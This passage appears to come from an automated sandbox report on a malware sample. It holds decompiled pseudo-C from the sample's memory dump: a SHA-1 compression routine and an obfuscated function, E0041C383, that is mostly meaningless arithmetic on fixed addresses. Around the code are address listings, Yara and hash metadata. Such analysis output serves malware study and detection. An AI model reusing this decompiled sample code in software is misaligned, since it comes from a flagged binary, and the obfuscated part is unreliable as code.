				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					_push(_t277);
					 *_t448 =  *_t448 - 1;
					 *(_t536 + _t353 * 4 - 0x14c) = ((0x00000038 << 0x00000008 | _t448) << 0x00000008 | _t277[0] & 0x000000ff) << 0x00000008 | _t277[0] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[0] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					_t448 = _t277[3] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[2] & 0x000000ff) << 0x00000008 | _t277[3] & 0x000000ff) << 0x00000008 | _t277[3] & 0x000000ff) << 0x00000008 | _t448;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[4]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t400 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t400;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t400;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t405 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t405 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t405;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t411 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t411;
					asm("rol edx, 0x5");
					_t285 = _t411 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t414 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t414 & _t325 | _t362 & _t414) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t414;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t414 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t405 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t405;
					_t502 = _t499 + (_t405 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t421 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t421;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t421 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t424 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t424) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t424;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t405 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t405;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t405 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t433 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t433;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t435 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t433 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t435;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t435 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t438 = _t369;
					_t358 = _v12;
					_v8 = _t438;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t438 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t405 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t405 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t405;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t446 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t446;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t446 + _v16 - 0x359d3e2a;
					_t405 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t405) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t405 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t405;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t405;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

































































                          0x00408c8b
                          0x00408c8f
                          0x00408c91
                          0x00408c91
                          0x00408c94
                          0x00408c96
                          0x00408c97
                          0x00408cb6
                          0x00408cdc
                          0x00408d02
                          0x00408d1b
                          0x00408d24
                          0x00408d2b
                          0x00408d2e
                          0x00408d31
                          0x00408d3a
                          0x00408d40
                          0x00408d47
                          0x00408d58
                          0x00408d5b
                          0x00408d5e
                          0x00408d62
                          0x00408d64
                          0x00408d66
                          0x00408d6f
                          0x00408d72
                          0x00408d75
                          0x00408d80
                          0x00408d86
                          0x00408d88
                          0x00408d88
                          0x00408d8b
                          0x00408d8e
                          0x00408d8e
                          0x00408d93
                          0x00408d95
                          0x00408d98
                          0x00408d9b
                          0x00408da1
                          0x00408da4
                          0x00408da7
                          0x00408db0
                          0x00408db6
                          0x00408dbf
                          0x00408dce
                          0x00408dd5
                          0x00408dd8
                          0x00408ddb
                          0x00408de4
                          0x00408de7
                          0x00408dea
                          0x00408e02
                          0x00408e09
                          0x00408e0b
                          0x00408e0e
                          0x00408e11
                          0x00408e1a
                          0x00408e21
                          0x00408e24
                          0x00408e27
                          0x00408e36
                          0x00408e3d
                          0x00408e40
                          0x00408e43
                          0x00408e4c
                          0x00408e56
                          0x00408e59
                          0x00408e65
                          0x00408e68
                          0x00408e6f
                          0x00408e72
                          0x00408e75
                          0x00408e7a
                          0x00408e7d
                          0x00408e86
                          0x00408e97
                          0x00408e9a
                          0x00408e9d
                          0x00408ea4
                          0x00408ea7
                          0x00408eaa
                          0x00408ead
                          0x00408eaf
                          0x00408eb2
                          0x00408eb5
                          0x00408ebe
                          0x00408ec3
                          0x00408ec3
                          0x00408ed8
                          0x00408edb
                          0x00408ede
                          0x00408ee5
                          0x00408ee8
                          0x00408eeb
                          0x00408f00
                          0x00408f07
                          0x00408f0a
                          0x00408f0e
                          0x00408f11
                          0x00408f16
                          0x00408f19
                          0x00408f28
                          0x00408f2b
                          0x00408f32
                          0x00408f35
                          0x00408f38
                          0x00408f3b
                          0x00408f3e
                          0x00408f46
                          0x00408f54
                          0x00408f57
                          0x00408f5a
                          0x00408f5a
                          0x00408f61
                          0x00408f64
                          0x00408f67
                          0x00408f6f
                          0x00408f7d
                          0x00408f80
                          0x00408f87
                          0x00408f8a
                          0x00408f8d
                          0x00408f90
                          0x00408f93
                          0x00408f9c
                          0x00408fa3
                          0x00408fa3
                          0x00408fa9
                          0x00408fc2
                          0x00408fc5
                          0x00408fcc
                          0x00408fcf
                          0x00408fd2
                          0x00408fe4
                          0x00408fee
                          0x00408ff1
                          0x00408ffa
                          0x00408ffd
                          0x00409004
                          0x00409007
                          0x0040900d
                          0x00409020
                          0x00409027
                          0x0040902a
                          0x0040902d
                          0x00409030
                          0x00409039
                          0x0040903c
                          0x0040904f
                          0x00409052
                          0x0040905c
                          0x0040905f
                          0x00409061
                          0x0040906a
                          0x0040906d
                          0x00409080
                          0x00409086
                          0x00409089
                          0x00409090
                          0x00409092
                          0x00409095
                          0x00409098
                          0x0040909b
                          0x0040909e
                          0x004090a1
                          0x004090aa
                          0x004090af
                          0x004090b2
                          0x004090b2
                          0x004090c5
                          0x004090c8
                          0x004090cb
                          0x004090d2
                          0x004090d5
                          0x004090d8
                          0x004090db
                          0x004090ee
                          0x004090f1
                          0x004090fc
                          0x004090ff
                          0x0040910b
                          0x0040910e
                          0x00409114
                          0x00409117
                          0x0040911a
                          0x00409121
                          0x00409131
                          0x00409134
                          0x0040913a
                          0x0040913d
                          0x00409144
                          0x00409146
                          0x00409149
                          0x0040914c
                          0x0040914f
                          0x00409152
                          0x00409159
                          0x00409168
                          0x0040916b
                          0x00409172
                          0x00409175
                          0x00409178
                          0x0040917b
                          0x0040917e
                          0x00409181
                          0x00409184
                          0x0040918d
                          0x0040919e
                          0x004091a6
                          0x004091ac
                          0x004091af
                          0x004091b1
                          0x004091b4
                          0x004091b7
                          0x004091c4

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                          • Instruction ID: dca45830a30d81ac6efaa6d2be11be043bd47579324ad2ebb8b4e79e22eae18d
                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                          • Instruction Fuzzy Hash: 90022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041C383, Relevance: 1.7, Strings: 1, Instructions: 419COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 54%
                          			E0041C383(void* __eax, signed char __ebx, signed int __ecx, signed int __edi) {
				signed char _t73;
				void* _t75;
				void* _t76;
				signed char _t77;
				signed int _t80;
				signed int _t88;
				signed int _t95;
				void* _t99;
				signed int _t101;
				signed int _t103;
				signed int _t108;

				_t95 = __edi;
				_t80 = __ecx;
				_t77 = __ebx;
				_t103 = 0xdbde29e9;
				if(( *0x8e42f6eb & _t108) <= 0) {
					L1:
					asm("adc bl, [0xa80d6ba2]");
					_t73 =  *0x37ac0027;
					_push(_t95);
					asm("rol dword [0x32610901], 0x4f");
					asm("sbb dh, 0xf6");
					 *0xc50cfca3 =  *0xc50cfca3 << 4;
					_t108 = _t108 + 0xc3632acb;
					 *0x9c0fc2f0 =  *0x9c0fc2f0 << 0x6b;
				} else {
					__edx =  *0x32690b7e * 0xf0d9;
					asm("lodsd");
					 *0x3e157e8e =  *0x3e157e8e << 0xfc;
					_push(__ebx);
					L1();
					__edx = 0xeb7c4fe8;
					asm("sbb esp, [0xdccbb319]");
					__edx = 0xffffffffeb7c4fe7;
					__al = __al |  *0x599f79f9;
					__edx =  *0x383aae6b * 0x264c;
					asm("sbb esp, [0xdec98913]");
					_t26 = __ebx;
					__ebx =  *0xcd19b7ee;
					 *0xcd19b7ee = _t26;
					_push(__edx);
					__ebp = __ebp -  *0x6017256c;
					asm("movsb");
					asm("lodsb");
					asm("stosd");
					__ch = __ch &  *0x2fa29d0c;
					__esi =  *0xc80713ea;
					__ebp = __ebp - 1;
					if(0xdbde29e9 < 0) {
						goto L1;
					} else {
						 *0xe3de0c72 =  *0xe3de0c72 >> 0x52;
						if(0xdbde29e9 <= 0) {
							goto L1;
						} else {
							asm("adc [0xac35e2b2], cl");
							__esp =  *0xabb4fd6b * 0xca0d;
							__esi = __esi - 1;
							_pop(__eax);
							_pop( *0x200dfc96);
							__esi =  *0x5e3ad83b;
							__ecx = __ecx ^ 0xef8d70b9;
							asm("adc ebx, [0xfc882bdf]");
							asm("ror byte [0x3022a218], 0xec");
							_push(__esi);
							__bl =  *0xf6cf0f04;
							__al = __al &  *0x9564a038;
							__ebp = __ebp &  *0xf21ae687;
							if(__esi >=  *0x7a2622d5) {
								goto L1;
							} else {
								__ecx =  *0x9e2f317d * 0xcf1a;
								__esi =  *0x22f4c79b;
								__eax = __eax -  *0xe99f1bec;
								_push(0xdbde29e9);
								__esi =  *0x5eb69f69 * 0x93ef;
								_push(__eax);
								 *0xb0d66b81 =  *0xb0d66b81 >> 0x5f;
								__ebx = __ebx ^  *0x8a7d14ea;
								_t39 = __bl;
								__bl =  *0x24e42522;
								 *0x24e42522 = _t39;
								asm("sbb [0x41a8771c], cl");
								 *0x98455720 =  *0x98455720 & __ch;
								__edx = __edx |  *0x9ede11fe;
								 *0xa79d196c =  *0xa79d196c ^ __edi;
								__ebx = __ebx | 0xf1004833;
								__ebx = __ebx -  *0x1eb12062;
								if(__ebx < 0) {
									goto L1;
								} else {
									 *0x488e6172 =  *0x488e6172 | __esi;
									if(( *0xa58c3aec & __ebx) >= 0) {
										goto L1;
									} else {
										asm("sbb eax, 0xfdaa771");
										__ebx = __ebx ^  *0xb7a001f8;
										__edx = __edx ^  *0x51e75e64;
										__bl = __bl | 0x0000008a;
										__edx =  *0xa1470a8f;
										__ch = 8;
										asm("adc bl, [0x37640e12]");
										asm("adc al, [0x9d5732d7]");
										 *0x974ea383 =  *0x974ea383 >> 0x5c;
										asm("adc cl, 0x12");
										 *0x3f3eb19f =  *0x3f3eb19f << 0xed;
										__ch = 0x00000008 &  *0xd5afddb3;
										 *0xcd0a3335 = __eax;
										__ecx = __ecx &  *0x1fed5433;
										asm("movsb");
										_pop(__esi);
										__bh = 0xca;
										 *0x170fff04 =  *0x170fff04 << 0xd9;
										asm("sbb eax, 0x9e99807");
										_pop(__edi);
										 *0xcbd17829 =  *0xcbd17829 - __eax;
										asm("rol byte [0x8a1470a], 0x9e");
										__cl = __cl + 0x12;
										asm("adc ebx, [0xbf25500d]");
										 *0x42813414 =  *0x42813414 & __ah;
										if( *0x42813414 >= 0) {
											goto L1;
										} else {
											__ebp =  *0x2bdfef7d * 0xfc88;
											__esp = 0xfacc7316;
											__esi = __esi ^ 0x2d06c007;
											__esi = __esi - 1;
											if(__esi != 0) {
												goto L1;
											} else {
												_pop( *0x231d2b75);
												asm("cmpsw");
												__edx =  *0xd7471c6b * 0xe46;
												 *0xa6a06e19 =  *0xa6a06e19 >> 0x5f;
												asm("rcr byte [0x15ae3414], 0x3a");
												asm("adc edi, [0xd7df973e]");
												asm("rcl dword [0x460b89a3], 0x70");
												__al = __al & 0x000000b6;
												__edx =  *0xd7471c6b * 0x00000e46 & 0xdb82cdde;
												if((__esi & 0x8e42f6eb) <= 0) {
													goto L1;
												} else {
													__edi =  *0xfc6d0c7e * 0x512;
													 *0x150f8918 =  *0x150f8918 ^ __al;
													__bh =  *0x3e1ad12;
													__bh =  *0x3e1ad12 ^ 0x00000032;
													if(__bh > 0) {
														goto L1;
													} else {
														__ebx =  *0x18e607f * 0xa84a;
														__eax = __eax + 1;
														 *0x2236b764 =  *0x2236b764 << 0xae;
														if( *0x2236b764 != 0) {
															goto L1;
														} else {
															__esp = 0xfacc7316 |  *0x2f317d7a;
															asm("adc ebx, [0x70a71b9e]");
															 *0xc4907cf2 =  *0xc4907cf2 + __cl;
															__ebp = __ebp - 1;
															__esi = __esi + 1;
															__ebx = __ebx +  *0xac2d6421;
															__edi = __edi + 1;
															__cl = __cl ^  *0xbf7c31a;
															asm("sbb esp, 0xeb03ba65");
															 *0xd812620e =  *0xd812620e - __ecx;
															asm("movsw");
															 *0xf59f843d =  *0xf59f843d + __eax;
															 *0x34652694 =  *0x34652694 ^ __ebp;
															__ebx = __ebx + 1;
															 *0x4c250ac2 =  *0x4c250ac2 >> 0xd9;
															asm("adc edi, [0xd333e0b]");
															asm("ror dword [0x5a208ec0], 0x0");
															 *0x8e32e781 =  *0x8e32e781 >> 0x55;
															_push( *0xe7e314fc);
															if(__ebp >=  *0x7f3d5803) {
																goto L1;
															} else {
																__ebp = __ebp + 0x1bcbaa73;
																_t52 = __cl;
																__cl =  *0x68ecbc63;
																 *0x68ecbc63 = _t52;
																__esp = __esp -  *0x66073726;
																asm("sbb [0xde11fe82], cl");
																__esi = __esi &  *0xf0206c9e;
																asm("ror byte [0xd9840ab2], 0x54");
																 *0x3304c113 =  *0x3304c113 + __esi;
																 *0x3a265f85 =  *0x3a265f85 & __ebp;
																if( *0x3a265f85 < 0) {
																	goto L1;
																} else {
																	__edi =  *0xbffb8c7c * 0x4500;
																	__dl = __dl |  *0x24a8f02c;
																	asm("adc [0xe3949214], cl");
																	__ebx = __ebx | 0x7d60b768;
																	__esp = __esp |  *0xff736713;
																	__cl = __cl + 0x18;
																	asm("ror dword [0xb77ba326], 0x4a");
																	 *0xfd6bac2a =  *0xfd6bac2a + __bh;
																	__bl = __bl - 0xb4;
																	asm("stosd");
																	 *0xca65f80a = __ah;
																	asm("rol dword [0x79e44f25], 0x86");
																	asm("adc al, [0x11ff0f04]");
																	asm("sbb esi, 0x8451c7c8");
																	__al =  *0x29b1a38;
																	 *0x1d22d914 =  *0x1d22d914 >> 0x24;
																	 *0x30656813 =  *0x30656813 ^ __ebp;
																	__ecx = 0x1faf7064;
																	__edx = __edx + 0xfda24dfc;
																	asm("sbb ebx, [0xa0cb8727]");
																	asm("sbb eax, 0x9da81acf");
																	 *0x20106206 = 0x1faf7064;
																	asm("scasb");
																	__eax = __eax +  *0xcd7fdcda;
																	asm("sbb bl, 0x3a");
																	 *0xafee95c2 =  *0xafee95c2 - __edx;
																	asm("adc [0xf77f4df0], ebx");
																	asm("adc [0x9715dcb4], dl");
																	asm("adc bl, 0x12");
																	_t65 = __esp;
																	__esp =  *0x265b7a0d;
																	 *0x265b7a0d = _t65;
																	 *0xf6cb27f2 =  *0xf6cb27f2 + __dh;
																	asm("sbb bl, [0x57700100]");
																	 *0xdbda4512 =  *0xdbda4512 ^ __bl;
																	__esp =  *0x265b7a0d |  *0x790e333e;
																	__ebx = __ebx -  *0xb2902b9b;
																	__dl = __dl & 0x00000008;
																	__esi = __esi +  *0x9710e2c4;
																	 *0x89a3d7df = __esp;
																	__edx = __edx +  *0x53df9a65;
																	 *0x38f2e2b2 = __dh;
																	__ebx = __ebx +  *0x4c250bc7;
																	asm("sbb edx, 0x11333e0b");
																	asm("sbb esp, [0x861f1385]");
																	 *0x91a621b3 =  *0x91a621b3 - __cl;
																	__edi =  *0xbffb8c7c * 0x00004500 | 0x5469f1de;
																	_pop(__eax);
																	if(__edi <= 0) {
																		goto L1;
																	} else {
																		asm("rcl dword [0x9ef7e20f], 0x35");
																		__dl = __dl &  *0x65a967b5;
																		__ah = __ah |  *0xa898a88;
																		__edi = __edi + 1;
																		 *0x151208a1 =  *0x151208a1 << 0x52;
																		__ch = __ch & 0x000000f2;
																		__edx =  *0x3f947e69 * 0x3933;
																		asm("lodsb");
																		_t68 = __edi;
																		__edi =  *0xcfd017c2;
																		 *0xcfd017c2 = _t68;
																		if((__edi & 0x5349f089) < 0) {
																			goto L1;
																		} else {
																			__ecx = 0x1faf7064 -  *0x4d303a70;
																			__esp = __esp ^ 0xcb050b26;
																			if(__esp != 0) {
																				goto L1;
																			} else {
																				__ebp = __ebp | 0x313a867a;
																				 *0x8e42f6eb =  *0x8e42f6eb ^ __ebp;
																				if( *0x8e42f6eb <= 0) {
																					goto L1;
																				} else {
																					__esi =  *0xe7511c7e * 0x66fd;
																					__ebp = __ebp + 0x995e159f;
																					__bh = __bh -  *0x54d6bee4;
																					asm("rol byte [0xcb8f09b3], 0x97");
																					 *0xc08ff42c =  *0xc08ff42c >> 0x96;
																					asm("rcl dword [0x2cfffc31], 0xe3");
																					__ebp = __ebp - 0xbf8d0a39;
																					__dl = __dl & 0x00000012;
																					_t71 = __bh;
																					__bh =  *0x24c4d700;
																					 *0x24c4d700 = _t71;
																					if( *0x5e3d29b3 >= __cl) {
																						goto L1;
																					} else {
																						__ebp =  *0x44975d7d * 0xddbd;
																						asm("scasd");
																						_push( *0xb3335d5);
																						asm("adc esp, 0xc623fecd");
																						_push(__edx);
																						asm("sbb ecx, 0x42f6eb23");
																						 *0xdb0d7e8e = __esi;
																						asm("sbb eax, [0xfb5332a9]");
																						__edx = __edx - 1;
																						__ebp =  *0x44975d7d * 0xddbd -  *0x58035191;
																						__esp = 0xffc7f3d;
																						 *0x674e3fbc =  *0x674e3fbc + 0xffc7f3d;
																						__dl = __dl ^ 0x00000014;
																						if(__edi >= 0) {
																							goto L1;
																							do {
																								do {
																									do {
																										do {
																											do {
																												do {
																													do {
																														do {
																															goto L1;
																														} while ( *0x9c0fc2f0 >= 0);
																														 *0x8ea0f73 =  *0x8ea0f73 & _t95;
																														asm("adc [0x35f78c39], esp");
																														 *0x96c94805 =  *0x96c94805 - _t103;
																														_t88 =  *0xb40d370d - 0xd99e449a;
																														 *0xf4b77c17 =  *0xf4b77c17 & _t95;
																													} while ( *0xf4b77c17 > 0);
																													 *0xfc915f77 = _t88;
																													 *0xc499e913 = _t95;
																													_t101 = _t101 - 0x67ca7ac2;
																													 *0xab96bf2c =  *0xab96bf2c << 0xcc;
																													asm("rol byte [0x691acf10], 0x28");
																													asm("sbb eax, [0xa9edda96]");
																													 *0x873d33da =  *0x873d33da >> 0x62;
																													asm("sbb ecx, [0xb7630a98]");
																													 *0x6307aef =  *0x6307aef ^ _t80;
																													 *0xff477d9c =  *0xff477d9c << 0x12;
																													asm("adc [0x5d0dc109], edx");
																													_t108 = _t108 &  *0xd7b0d40f;
																													asm("sbb edi, [0xa0056b81]");
																													asm("rol byte [0xd8544c0a], 0x62");
																													_push(0x88995a29);
																													 *0xaff16f0 =  *0xaff16f0 - _t108;
																													 *0x99b7c904 =  *0x99b7c904 - _t80;
																													asm("rol dword [0x8a0fff17], 0xde");
																													_t103 = (_t103 ^  *0xf09f6d37) -  *0xb1ad16ed;
																													_t95 =  *0xc499e913 +  *0x4602fcd1;
																													_t88 =  *0xfc915f77 ^  *0x12121fcf;
																													 *0xeeea6a3c =  *0xeeea6a3c - _t80;
																													asm("cmpsb");
																													asm("adc esp, [0x201fd101]");
																													asm("rcr dword [0x97735bf7], 0x3f");
																													asm("rcr byte [0x2d9451d7], 0xb7");
																												} while (( *0x9be42b33 & _t73 &  *0xd7045408) < 0);
																												_pop( *0x81f71778);
																												 *0x7900b00 = _t88;
																												asm("adc eax, 0x5b7eb1f");
																												 *0xb2108fec =  *0xb2108fec << 0x2c;
																												_t103 =  *0xb10f2e;
																												asm("ror byte [0x9f632508], 0x6d");
																												 *0xbd78d8a1 =  *0xbd78d8a1 >> 0x55;
																												 *0xb2ab4 =  *0xb2ab4 >> 0x20;
																												asm("cmpsb");
																												_pop(_t88);
																												_t80 = 0x30075c06 +  *0x6abb269a +  *0x8f6cc481 -  *0x418fd120;
																												asm("sbb [0xc4419a08], ah");
																												_t14 = _t77 |  *0x5a21d3c9;
																												_t77 =  *0x2cd19732;
																												 *0x2cd19732 = _t14;
																												_pop(_t99);
																												_t95 = _t99 +  *0x655783f3;
																												_t15 = _t108 &  *0xbd34f79b;
																												_t108 =  *0x667509d5;
																												 *0x667509d5 = _t15;
																											} while (_t95 < 0);
																											asm("rol dword [0xfc075b78], 0x38");
																											_pop(_t75);
																											 *0xf45da935 =  *0xf45da935 ^ _t88;
																											_t88 = 0x6204dd16;
																											_pop( *0x37262a01);
																											_push(_t108);
																											_t77 = _t77 & 0xe095b2d1;
																											_t18 = _t95;
																											_t95 =  *0x3599fa29;
																											 *0x3599fa29 = _t18;
																										} while (_t77 <= 0);
																										_push(0x30075c06);
																										asm("adc [0xe8cba31], edi");
																										_t80 = _t80 - 0xa03b4c1b;
																										_t77 = _t77 + 1;
																										 *0x8a945afe =  *0x8a945afe >> 0x9b;
																										asm("adc ebx, 0x4de06791");
																										asm("adc [0xb880b5ea], esp");
																										 *0xde0962cb =  *0xde0962cb ^ 0x30075c06;
																										_t88 =  *0x4617267;
																										_t76 = _t75 + 1;
																										asm("sbb [0xb6bbe87], esi");
																										asm("adc ecx, 0x37166f81");
																										_push( *0x6c20abd1);
																										_t103 = (_t103 &  *0x58d18f17) - 1 -  *0xb7edbcb;
																									} while ((_t80 & 0x0000000c) >= 0);
																									_push(0x30075c06);
																								} while ( *0xdbcb6d1f <= _t95);
																								_t108 =  *0xe1ac0e7e * 0xe6f7;
																								asm("cmpsb");
																								_t77 = _t77 ^ 0xf6d66ded;
																								_pop( *0x6dc70e89);
																								asm("ror dword [0xd997f5fc], 0xcd");
																								_t103 = _t103 +  *0x2035c296;
																							} while (_t103 >= 0);
																							asm("rcl dword [0x89aa2079], 0xec");
																							 *0xb01d1a32 =  *0xb01d1a32 ^ 0x00000012;
																							asm("ror dword [0x2ba99afd], 0x6");
																							 *0x8e2a230c =  *0x8e2a230c | _t77;
																							 *0x5b6520dd = _t101 | 0x86b51233;
																							 *0x3fd06fc1 = 0x12;
																							 *0xd332c94 =  *0xd332c94 >> 0x3e;
																							asm("adc ch, 0x1c");
																							return _t76;
																						} else {
																							__ebx =  *0xa62db67d * 0xb990;
																							 *0x61210cd =  *0x61210cd + __edx;
																							__ch = __ch ^ 0x000000ca;
																							 *0xf5b621d =  *0xf5b621d << 0x30;
																							__al = __al | 0x000000de;
																							return __eax;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}














                          0x0041c383
                          0x0041c383
                          0x0041c383
                          0x0041c383
